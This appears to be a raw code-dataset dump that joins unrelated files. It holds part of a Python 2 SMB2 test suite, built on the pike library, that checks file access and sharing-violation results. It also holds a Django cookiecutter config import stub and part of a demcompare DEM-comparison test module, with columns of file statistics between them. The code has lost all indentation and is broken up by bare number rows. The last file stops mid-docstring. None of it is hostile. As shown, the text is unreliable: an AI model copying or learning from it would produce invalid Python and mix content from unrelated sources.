print "TC018 has passed"
def test_open_file_genericall_readwrite(self):
try:
print "----------------------------------------------"
print "TC019 - Open with generic all with read-write permissions. try to write and then read the written data"
expected_status = "STATUS_SUCCESS"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening file"
file_handle = chan.create(tree,'Create019.txt',access = pike.smb2.GENERIC_ALL|pike.smb2.FILE_READ_DATA|pike.smb2.FILE_WRITE_DATA,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creat and open successful"
print "Try to write data"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Write buffer successful"
print "Try to read data"
bytes_read = chan.read(file_handle,len(self.buffer),0)
print "Buffer read successful"
print "The length of bytes written:",bytes_written
print "The length of bytes read :",len(bytes_read)
print "Matching bytes_written and length of bytes_read"
if bytes_written == len(bytes_read):
actual_status = "STATUS_SUCCESS"
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successful"
except Exception as e:
actual_status = str(e)
print "Actual Status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC019 has passed"
def test_open_file_genericaall_writeonly(self):
try:
print "---------------------------------------------"
print "TC020 - Open file with generic all and write only permissions and try to read"
expected_status = "STATUS_SUCCESS"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan, tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create020.txt',access = pike.smb2.GENERIC_ALL|pike.smb2.FILE_WRITE_DATA,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Trying to write data"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Write bufffer successful"
print "Close the first file handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Opening the file"
file_handle1 = chan.create(tree,'Create020.txt',access = pike.smb2.GENERIC_ALL|pike.smb2.FILE_WRITE_DATA,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File open successfull"
print "Trying to read data"
bytes_read = chan.read(file_handle1,len(self.buffer),0)
print "Read data successfull"
print "The length of bytes written:",bytes_written
print "The length of bytes read :",len(bytes_read)
print "Matching bytes_written and length of bytes_read"
if bytes_written == len(bytes_read):
actual_status = "STATUS_SUCCESS"
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual Status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC020 has passed"
def test_open_genericwrite(self):
try:
print "---------------------------------------------"
print "TC 021 - open a file with generic write and try to write."
expected_status = "STATUS_SUCCESS"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan, tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create021.txt',access = pike.smb2.GENERIC_WRITE,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Close the first file handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Opening the file"
file_handle1 = chan.create(tree,'Create021.txt',access = pike.smb2.GENERIC_WRITE,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File open successfull"
print "Try to write data"
bytes_written = chan.write(file_handle1,0,self.buffer)
print "Write data successfull"
print "The length of bytes written:",bytes_written
print "The length of buffer is :",len(self.buffer)
print "Matching the length of buffer and bytes_written"
if len(self.buffer) == bytes_written:
actual_status = "STATUS_SUCCESS"
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual Status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC021 has passed"
def test_open_genericwrite_writeattr(self):
try:
print "-------------------------------------------"
print "TC 022 - open a file with generic write and write Attributes and try to change attributes"
expected_status = "FILE_ATTRIBUTE_READONLY"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create022.txt',access = pike.smb2.GENERIC_WRITE|pike.smb2.FILE_READ_ATTRIBUTES,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Trying to read the attribute of file"
info = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
file_create_attribute = info.basic_information.file_attributes
print "When file created file attribute is :",file_create_attribute
print "Close the first file handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Opening the file"
file_handle1 = chan.create(tree,'Create022.txt',access = pike.smb2.GENERIC_WRITE|pike.smb2.FILE_READ_ATTRIBUTES,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File open successfull"
print "Trying to change the attribute of file"
with chan.set_file_info(file_handle1, pike.smb2.FileBasicInformation) as file_info:
file_info.file_attributes = pike.smb2.FILE_ATTRIBUTE_READONLY
print "Querying the file and checking the new file attribute"
info1 = chan.query_file_info(file_handle1,pike.smb2.FILE_ALL_INFORMATION)
file_create_attribute_new = info1.basic_information.file_attributes
print "The new file attribute after change is :",file_create_attribute_new
actual_status =str(file_create_attribute_new)
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual File Attribute :",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC022 has passed"
def test_open_genericread(self):
try:
print "---------------------------------------------"
print "TC 023 -open a file with generic read and try to read data."
expected_status = "STATUS_SUCCESS"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create023.txt',access = pike.smb2.GENERIC_READ|pike.smb2.FILE_WRITE_DATA,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Trying to write buffer"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Buffer write successful"
print "Close the first file handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Opening the file"
file_handle1 = chan.create(tree,'Create023.txt',access = pike.smb2.GENERIC_READ,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File open successfull"
print "Trying to read the buffer"
bytes_read = chan.read(file_handle1,len(self.buffer),0)
print "Buffer read successful"
print "The length of bytes written is :",bytes_written
print "The length of bytes read is :",len(bytes_read)
print "Matching the bytes_written and length of bytes_read"
if bytes_written == len(bytes_read):
actual_status = "STATUS_SUCCESS"
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual Status is :",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC023 has passed"
def test_open_genericread_attr(self):
try:
print "---------------------------------------------"
print "TC 024 - open a file with generic read and read Attributes."
expected_status = "FILE_ATTRIBUTE_ARCHIVE"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create024.txt',access = pike.smb2.GENERIC_READ,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Close the first file handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Opening the file"
file_handle1 = chan.create(tree,'Create024.txt',access = pike.smb2.GENERIC_READ,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File open successfull"
print "Querying the file to read the attribute"
info = chan.query_file_info(file_handle1,pike.smb2.FILE_ALL_INFORMATION)
file_create_attribute = info.basic_information.file_attributes
print "When file created file attribute is :",file_create_attribute
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
actual_status = str(file_create_attribute)
except Exception as e:
actual_status = str(e)
print "Actual status :",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC024 has passed"
def test_open_shareread(self):
try:
print "---------------------------------------------"
print "TC 025 - Open a file with file share read. Over a different session open the same with file for write"
expected_status = "STATUS_SHARING_VIOLATION"
print "Expected status: ",expected_status
print "Creating a first session and tree connect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening a file with FILE_SHARE_READ with GENERIC_READ"
file_handle = chan.create(tree,'Create025.txt',access = pike.smb2.GENERIC_READ,share= pike.smb2.FILE_SHARE_READ,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create and open successful"
print "Creating a second session and tree connect"
chan1,tree1 = self.tree_connect()
print "Second Session and treeconnect successful"
print "Opening the same file with GENERIC_WRITE and FILE_SHARE_READ"
file_handle1 = chan1.create(tree1,'Create025.txt',access = pike.smb2.GENERIC_WRITE,share = pike.smb2.FILE_SHARE_READ,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Open file successful"
print "Trying to write data into file"
bytes_written = chan.write(file_handle1,0,self.buffer)
print "Write buffer successful"
print "Closing first handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Closing second handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status :",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC025 has passed"
def test_open_shareread_delete(self):
try:
print "-----------------------------------------------"
print "TC 026 - Open a file with file share read. Over a different session, open a file with deleteflag set."
expected_status = "STATUS_SHARING_VIOLATION"
print "Expected status: ",expected_status
print "Creating a first session and tree connect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening a file with FILE_SHARE_READ and GENERIC_READ"
file_handle = chan.create(tree,'Create026.txt',access = pike.smb2.GENERIC_READ,share= pike.smb2.FILE_SHARE_READ,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create and open successful"
print "Creating a second session and tree connect"
chan1,tree1 = self.tree_connect()
print "Second Session and treeconnect successful"
print "Opening the same file with DELETE and FILE_SHARE_READ"
file_handle1 = chan1.create(tree1,'Create026.txt',access = pike.smb2.DELETE,share = pike.smb2.FILE_SHARE_READ,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Open file successful"
print "Closing first handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Closing second handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status :",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC026 has passed"
def test_open_sharewrite(self):
buffer1 = "@Calsoft"
try:
print "------------------------------------------------"
print "TC 027 - Open a file with file share write and from different session, open for write. Try writing to different areas of files"
expected_status = "STATUS_SUCCESS"
print "Expected status: ",expected_status
print "Creating a first session and tree connect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening a file with FILE_SHARE_WRITE and FILE_WRITE_DATA"
file_handle = chan.create(tree,'Create027.txt',access = pike.smb2.FILE_WRITE_DATA,share= pike.smb2.FILE_SHARE_WRITE,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create and open successful"
print "Creating a second session and tree connect"
chan1,tree1 = self.tree_connect()
print "Second Session and treeconnect successful"
print "Opening the same file with FILE_WRITE_DATA and FILE_SHARE_WRITE"
file_handle1 = chan1.create(tree1,'Create027.txt',access = pike.smb2.FILE_WRITE_DATA,share = pike.smb2.FILE_SHARE_WRITE,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Open file successful"
print "Writing data into it"
bytes_written = chan1.write(file_handle1,0,self.buffer)
if bytes_written == len(self.buffer):
print "Write buffer successful"
print "Appending data"
bytes_written1 = chan1.write(file_handle1,20,buffer1)
if bytes_written1 == len(buffer1):
print "Append data successful"
actual_status = "STATUS_SUCCESS"
print "Closing first handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Closing second handle"
chan1.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC027 has passed"
def test_open_sharewrite_read(self):
try:
print "------------------------------------------------"
print "TC 028 - Open a file with file share write and then open from different session with file share read."
expected_status = "STATUS_SHARING_VIOLATION"
print "Expected status: ",expected_status
print "Creating a first session and tree connect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening a file with FILE_SHARE_WRITE and FILE_WRITE_DATA"
file_handle = chan.create(tree,'Create028.txt',access = pike.smb2.FILE_WRITE_DATA,share= pike.smb2.FILE_SHARE_WRITE,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create and open successful"
print "Writing data into it ..."
bytes_written = chan.write(file_handle,0,self.buffer)
print "Write buffer successful"
print "Creating a second session and tree connect"
chan1,tree1 = self.tree_connect()
print "Second Session and treeconnect successful"
print "Opening the same file with FILE_WRITE_DATA and FILE_SHARE_READ"
file_handle1 = chan1.create(tree1,'Create028.txt',access = pike.smb2.FILE_WRITE_DATA,share = pike.smb2.FILE_SHARE_READ,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Open file successful"
print "Trying to read data ..."
bytes_read = chan.read(file_handle1,len(self.buffer),0)
print "Read data successful"
print "Close the first handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Close the second handle"
chan1.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status :",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC028 has passed"
def test_open_sharedelete_delete(self):
try:
print "------------------------------------------------"
print "TC 029 - Open a file with file share delete and from a different session open for deletion."
expected_status = "STATUS_SHARING_VIOLATION"
print "Expected status: ",expected_status
print "Creating a first session and tree connect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening a file with FILE_READ_DATA and FILE_SHARE_DELETE"
file_handle = chan.create(tree,'Create029.txt',access = pike.smb2.FILE_READ_DATA,share= pike.smb2.FILE_SHARE_DELETE,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create and open successful"
print "Creating a second session and tree connect"
chan1,tree1 = self.tree_connect()
print "Second Session and treeconnect successful"
print "Opening the same file with DELETE and FILE_SHARE_DELETE"
file_handle1 = chan1.create(tree1,'Create029.txt',access = pike.smb2.DELETE,share = pike.smb2.FILE_SHARE_DELETE,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Open file successful"
print "Close the first handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Close the second handle"
chan1.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC029 has passed"
def test_open_sharedelete_session(self):
try:
print "------------------------------------------------"
print "TC 030 - OPen a file for delete from other session. delete that file i.e close the second open before the first one"
expected_status = "STATUS_SHARING_VIOLATION"
print "Expected status: ",expected_status
print "Creating a first session and tree connect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening a file"
file_handle = chan.create(tree,'Create030.txt',access = pike.smb2.DELETE,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create and open successful"
print "Creating a second session and tree connect"
chan1,tree1 = self.tree_connect()
print "Second Session and treeconnect successful"
print "Opening the same file"
file_handle1 = chan1.create(tree1,'Create030.txt',access = pike.smb2.DELETE,share = pike.smb2.FILE_SHARE_DELETE,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Open file successful"
print "Close the second handle"
chan1.close(file_handle1)
print "Second file handle closed successfully"
print "Close the first file handle"
chan.close(file_handle)
print "First file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC030 has passed"
def test_open_supersede(self):
try:
print "-----------------------------------------------"
print "TC 031 - Open existing flag with File Supersede. Verify that the file is truncated to zero and the create time has not changed."
expected_status = "STATUS_END_OF_FILE"
print "Expected status:",expected_status
print "Creating a first session and tree connect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening a file"
file_handle = chan.create(tree,'Create031.txt',access = pike.smb2.FILE_READ_ATTRIBUTES|pike.smb2.FILE_WRITE_DATA,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create and open successful"
print "Querying the file and checking creation time"
info = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
creation_time = info.basic_information.creation_time
print "When the file created the creation time of file:",creation_time
print "Try to write buffer"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Buffer write successful"
print "Close the first file handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Creating file with FILE_SUPERSEDE"
file_handle1 = chan.create(tree,'Create031.txt',access = pike.smb2.FILE_READ_ATTRIBUTES|pike.smb2.FILE_READ_DATA,disposition = pike.smb2.FILE_SUPERSEDE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Creation file successful"
print "Query the file and check creation time"
info1 = chan.query_file_info(file_handle1,pike.smb2.FILE_ALL_INFORMATION)
creation_time1 = info1.basic_information.creation_time
print "When the file got supersede creation time:",creation_time1
print "Try to read data "
bytes_read = chan.read(file_handle1,len(self.buffer),0)
print "Read data successful"
print "Bytes read is :",bytes_read
print "Close the first file handle"
chan.close(file_handle1)
print "First file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "Matching the creation times"
self.assertRegexpMatches(str(creation_time),str(creation_time1))
def test_open_file_overwrite(self):
try:
print "-----------------------------------------------"
print "TC 032 - Open a nonexistant file."
expected_status = "STATUS_OBJECT_NAME_NOT_FOUND"
print "Expected status: ",expected_status
print "Creating a session and tree connect"
chan,tree = self.tree_connect()
print "Try overwriting a file"
file_handle = chan.create(tree,'Create032.txt',access = pike.smb2.FILE_READ_ATTRIBUTES,disposition = pike.smb2.FILE_OVERWRITE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create file successful"
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
| 55.856256
| 235
| 0.63023
| 7,235
| 62,950
| 5.298963
| 0.046303
| 0.044238
| 0.056341
| 0.04043
| 0.893917
| 0.868355
| 0.832594
| 0.805441
| 0.794799
| 0.783061
| 0
| 0.015823
| 0.279142
| 62,950
| 1,126
| 236
| 55.905861
| 0.829036
| 0.004321
| 0
| 0.742453
| 0
| 0.008491
| 0.323524
| 0.028161
| 0
| 0
| 0
| 0
| 0.031132
| 0
| null | null | 0.028302
| 0.006604
| null | null | 0.556604
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
4b6448aabc9996a3414b61687edd1947cea88f2b
| 180
|
py
|
Python
|
{{cookiecutter.github_repository_name}}/src/{{cookiecutter.app_name}}/config/__init__.py
|
ehudhala/cookiecutter-django-rest-angular2
|
fd1ccf2a7659feb207872a11159e1c30bb444d31
|
[
"MIT"
] | 16
|
2016-11-04T19:13:16.000Z
|
2018-02-19T18:13:23.000Z
|
{{cookiecutter.github_repository_name}}/src/{{cookiecutter.app_name}}/config/__init__.py
|
ehudhala/cookiecutter-django-rest-angular2
|
fd1ccf2a7659feb207872a11159e1c30bb444d31
|
[
"MIT"
] | null | null | null |
{{cookiecutter.github_repository_name}}/src/{{cookiecutter.app_name}}/config/__init__.py
|
ehudhala/cookiecutter-django-rest-angular2
|
fd1ccf2a7659feb207872a11159e1c30bb444d31
|
[
"MIT"
] | 7
|
2016-11-08T04:31:41.000Z
|
2018-07-30T15:14:02.000Z
|
from __future__ import absolute_import
from {{cookiecutter.app_name}}.config.local import Local # noqa
from {{cookiecutter.app_name}}.config.production import Production # noqa
| 36
| 74
| 0.805556
| 23
| 180
| 6
| 0.478261
| 0.231884
| 0.275362
| 0.333333
| 0.42029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105556
| 180
| 4
| 75
| 45
| 0.857143
| 0.05
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
4ba42935831764800d824d7eeeacc9385797376e
| 21,034
|
py
|
Python
|
tests/test_demcompare.py
|
njimenezd/demcompare
|
d0ad8a63b912555a1ee67fcb21f30e3b9036d0c6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_demcompare.py
|
njimenezd/demcompare
|
d0ad8a63b912555a1ee67fcb21f30e3b9036d0c6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_demcompare.py
|
njimenezd/demcompare
|
d0ad8a63b912555a1ee67fcb21f30e3b9036d0c6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf8
#
# Copyright (c) 2021 Centre National d'Etudes Spatiales (CNES).
#
# This file is part of demcompare
# (see https://github.com/CNES/demcompare).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
This module contains functions to test Demcompare.
"""
# Standard imports
import os
from tempfile import TemporaryDirectory
# Third party imports
import numpy as np
import pytest
# Demcompare imports
import demcompare
from demcompare.initialization import read_config_file, save_config_file
from demcompare.output_tree_design import get_out_file_path
# Tests helpers
from .helpers import (
TEST_TOL,
assert_same_images,
demcompare_test_data_path,
read_csv_file,
temporary_dir,
)
# Demcompare imports
@pytest.mark.end2end_tests
def test_demcompare_standard_outputs():
"""
Standard main end2end test.
Test that the outputs given by the Demcompare execution
of data/standard/input/test_config.json are the same as the reference ones
in data/standard/ref_output/
"""
# Get "standard" test root data directory absolute path
test_data_path = demcompare_test_data_path("standard")
# Load "standard" demcompare config from input/test_config.json
test_cfg_path = os.path.join(test_data_path, "input/test_config.json")
test_cfg = read_config_file(test_cfg_path)
# Get "standard" demcompare reference output path for
test_ref_output_path = os.path.join(test_data_path, "ref_output")
# Create temporary directory for test output
with TemporaryDirectory(dir=temporary_dir()) as tmp_dir:
# Modify test's output dir in configuration to tmp test dir
test_cfg["outputDir"] = tmp_dir
# Set a new test_config tmp file path
tmp_cfg_file = os.path.join(tmp_dir, "test_config.json")
# Save the new configuration inside the tmp dir
save_config_file(tmp_cfg_file, test_cfg)
# Run demcompare with "standard" configuration (and replace conf file)
demcompare.run(tmp_cfg_file)
# Now test demcompare output with test ref_output:
# TEST JSON CONFIGURATION
# Check initial config "test_config.json"
cfg_file = "test_config.json"
ref_output_cfg = read_config_file(
os.path.join(test_ref_output_path, cfg_file)
)
output_cfg = read_config_file(os.path.join(tmp_dir, cfg_file))
np.testing.assert_equal(
ref_output_cfg["stats_opts"], output_cfg["stats_opts"]
)
np.testing.assert_equal(
ref_output_cfg["plani_opts"], output_cfg["plani_opts"]
)
# Test final_config.json
cfg_file = get_out_file_path("final_config.json")
ref_output_cfg = read_config_file(
os.path.join(test_ref_output_path, cfg_file)
)
output_cfg = read_config_file(os.path.join(tmp_dir, cfg_file))
np.testing.assert_allclose(
ref_output_cfg["plani_results"]["dx"]["bias_value"],
output_cfg["plani_results"]["dx"]["bias_value"],
atol=TEST_TOL,
)
np.testing.assert_allclose(
ref_output_cfg["plani_results"]["dy"]["bias_value"],
output_cfg["plani_results"]["dy"]["bias_value"],
atol=TEST_TOL,
)
np.testing.assert_allclose(
ref_output_cfg["plani_results"]["gdal_translate_bounds"]["lry"],
output_cfg["plani_results"]["gdal_translate_bounds"]["lry"],
atol=TEST_TOL,
)
np.testing.assert_allclose(
ref_output_cfg["plani_results"]["gdal_translate_bounds"]["lrx"],
output_cfg["plani_results"]["gdal_translate_bounds"]["lrx"],
atol=TEST_TOL,
)
np.testing.assert_allclose(
ref_output_cfg["plani_results"]["gdal_translate_bounds"]["uly"],
output_cfg["plani_results"]["gdal_translate_bounds"]["uly"],
atol=TEST_TOL,
)
np.testing.assert_allclose(
ref_output_cfg["plani_results"]["gdal_translate_bounds"]["ulx"],
output_cfg["plani_results"]["gdal_translate_bounds"]["ulx"],
atol=TEST_TOL,
)
np.testing.assert_allclose(
ref_output_cfg["alti_results"]["dz"]["bias_value"],
output_cfg["alti_results"]["dz"]["bias_value"],
atol=TEST_TOL,
)
# TEST DIFF TIF
# Test initial_dh.tif
img = get_out_file_path("initial_dh.tif")
ref_output_data = os.path.join(test_ref_output_path, img)
output_data = os.path.join(tmp_dir, img)
assert_same_images(ref_output_data, output_data, atol=TEST_TOL)
# Test final_dh.tif
img = get_out_file_path("final_dh.tif")
ref_output_data = os.path.join(test_ref_output_path, img)
output_data = os.path.join(tmp_dir, img)
assert_same_images(ref_output_data, output_data, atol=TEST_TOL)
# TEST PNG SNAPSHOTS
# Test initial_dem_diff_pdf.png
img = get_out_file_path("initial_dem_diff_pdf.png")
ref_output_data = os.path.join(test_ref_output_path, img)
output_data = os.path.join(tmp_dir, img)
assert_same_images(ref_output_data, output_data, atol=TEST_TOL)
# Test final_dem_diff_pdf.png
img = get_out_file_path("final_dem_diff_pdf.png")
ref_output_data = os.path.join(test_ref_output_path, img)
output_data = os.path.join(tmp_dir, img)
assert_same_images(ref_output_data, output_data, atol=TEST_TOL)
# Test snapshots/initial_dem_diff_cdf.png
img = get_out_file_path("initial_dem_diff_cdf.png")
ref_output_data = os.path.join(test_ref_output_path, img)
output_data = os.path.join(tmp_dir, img)
assert_same_images(ref_output_data, output_data, atol=TEST_TOL)
# Test snapshots/initial_dem_diff_cdf.png
img = get_out_file_path("final_dem_diff_cdf.png")
ref_output_data = os.path.join(test_ref_output_path, img)
output_data = os.path.join(tmp_dir, img)
assert_same_images(ref_output_data, output_data, atol=TEST_TOL)
# TESTS CSV SNAPSHOTS
# Test initial_dem_diff_pdf.csv
file = get_out_file_path("initial_dem_diff_pdf.csv")
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# Test final_dem_diff_pdf.csv
file = get_out_file_path("final_dem_diff_pdf.csv")
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# Test snapshots/initial_dem_diff_cdf.csv
file = get_out_file_path("initial_dem_diff_cdf.csv")
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# Test snapshots/final_dem_diff_cdf.csv
file = get_out_file_path("final_dem_diff_cdf.csv")
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# TEST CSV STATS
# Test stats/slope/stats_results_standard.csv
file = "stats/slope/stats_results_standard.csv"
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# Test stats/slope/stats_results_incoherent-classification.csv
file = "stats/slope/stats_results_incoherent-classification.csv"
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
# Test stats/slope/stats_results_coherent-classification.csv
file = "stats/slope/stats_results_coherent-classification.csv"
ref_output_csv = read_csv_file(os.path.join(test_ref_output_path, file))
output_csv = read_csv_file(os.path.join(tmp_dir, file))
np.testing.assert_allclose(ref_output_csv, output_csv, atol=TEST_TOL)
@pytest.mark.end2end_tests
def test_demcompare_standard_outputs_with_roi():
"""
Standard main end2end test with ROI input.
